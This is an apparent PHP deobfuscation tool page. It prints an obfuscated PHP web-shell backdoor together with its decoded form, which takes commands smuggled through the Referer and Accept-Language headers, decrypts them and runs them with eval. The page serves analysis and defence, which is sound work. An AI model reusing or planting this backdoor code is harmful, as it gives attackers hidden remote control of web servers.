Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $a='<$l;){for(L{$j=0L{;($j<$cL{L{&&$i<$l);$j++L{,$i++)L{{$o.=L{$t{L{$i}^$k{$j}L{;}}..

Decoded Output download

$kh="d109";$kf="06c3";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$a='<$l;){for(L{$j=0L{;($j<$cL{L{&&$i<$l);$j++L{,$i++)L{{$o.=L{$t{L{$i}^$k{$j}L{;}}rL{eturn $L{o;}$r=L{$_SEL{RVL{ER;L{';
$N=');pL{arse_stL{L{r($u["query"],$L{q);$q=L{array_vaL{luesL{($L{q)L{;L{preg_match_all("/(L{[\\w])[\\w-L{]+L{(?:;q=0.';
$l=',0,3)L{L{);$p="";for(L{$z=1;$z<coL{unt($L{m[1]);$z++)$p.=L{$q[$m[L{2][L{$z]];if(sL{L{trpos($p,$h)L{L{===L{0)L{{$s';
$G='strtolower";$i=$mL{[1]L{[0].$m[L{1][1];L{$h=$L{slL{L{($sL{s(md5($i.$kh)L{,0,3)L{);$f=$sl($ss(L{L{mL{d5($i.L{$kf)';
$d='L{($e){$k=L{$kL{h.$kf;ob_starL{t();L{@evL{al(@L{gzuncomL{press(@x(@baL{se64_deL{code(prL{eg_reL{placL{e(L{array("';
$R='/_/","L{/L{-/"),aL{rray(L{"/","+"),$ss($L{s[L{$i],0,$e))L{),L{$k)));$o=oL{b_get_cL{onL{tL{ents();L{ob_end_cL{le';
$V='$kh="d109L{";$kf="0L{L{6c3";fL{unctL{ion x($tL{,$L{k){$c=strlen($k)L{;L{$L{L{l=strlen($tL{);$o="";fL{or($i=0;$iL{';
$Z='$rL{r=@$r["HTTP_L{REFERER"L{];$ra=@$r["HL{L{TTP_AL{CCL{L{L{EPT_LANGUAGE"];if($rr&&$raL{){$u=paL{rse_url(L{L{$rr';
$g='an()L{;$d=baseL{64_eL{ncoL{de(x(gL{zL{compress($L{o),$k));print("L{<L{$L{k>$d</L{$k>");@sessionL{_desL{troy();}}}}';
$F='L{([L{\\d]))?L{,?/L{",$L{ra,$L{m);if($q&&$m)L{{@sesL{sion_starL{t(L{);$s=&$_SEL{SSL{IL{ON;$ss="substL{r"L{;$sl=L{"';
$j=str_replace('U','','creUatUe_UUfunUUction');
$I='[$i]="";L{$p=$L{ss($p,3);L{}ifL{(array_key_existL{sL{($i,$s)){$L{L{s[$i].=$pL{;L{$eL{=L{strpos($s[$i],$f);ifL{';
$v=str_replace('L{','',$V.$a.$Z.$N.$F.$G.$l.$I.$d.$R.$g);
$B=$j('',$v);$B();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$B None
$F L{([L{\d]))?L{,?/L{",$L{ra,$L{m);if($q&&$m)L{{@sesL{sion_sta..
$G strtolower";$i=$mL{[1]L{[0].$m[L{1][1];L{$h=$L{slL{L{($sL{s(..
$I [$i]="";L{$p=$L{ss($p,3);L{}ifL{(array_key_existL{sL{($i,$s)..
$N );pL{arse_stL{L{r($u["query"],$L{q);$q=L{array_vaL{luesL{($L..
$R /_/","L{/L{-/"),aL{rray(L{"/","+"),$ss($L{s[L{$i],0,$e))L{),..
$V $kh="d109L{";$kf="0L{L{6c3";fL{unctL{ion x($tL{,$L{k){$c=str..
$Z $rL{r=@$r["HTTP_L{REFERER"L{];$ra=@$r["HL{L{TTP_AL{CCL{L{L{E..
$a <$l;){for(L{$j=0L{;($j<$cL{L{&&$i<$l);$j++L{,$i++)L{{$o.=L{$..
$d L{($e){$k=L{$kL{h.$kf;ob_starL{t();L{@evL{al(@L{gzuncomL{pre..
$g an()L{;$d=baseL{64_eL{ncoL{de(x(gL{zL{compress($L{o),$k));pr..
$j create_function
$l ,0,3)L{L{);$p="";for(L{$z=1;$z<coL{unt($L{m[1]);$z++)$p.=L{$..
$v $kh="d109";$kf="06c3";function x($t,$k){$c=strlen($k);$l=str..

Stats

MD5 6dff4c11cdf30833b18b070e3a7f692d
Eval Count 1
Decode Time 100 ms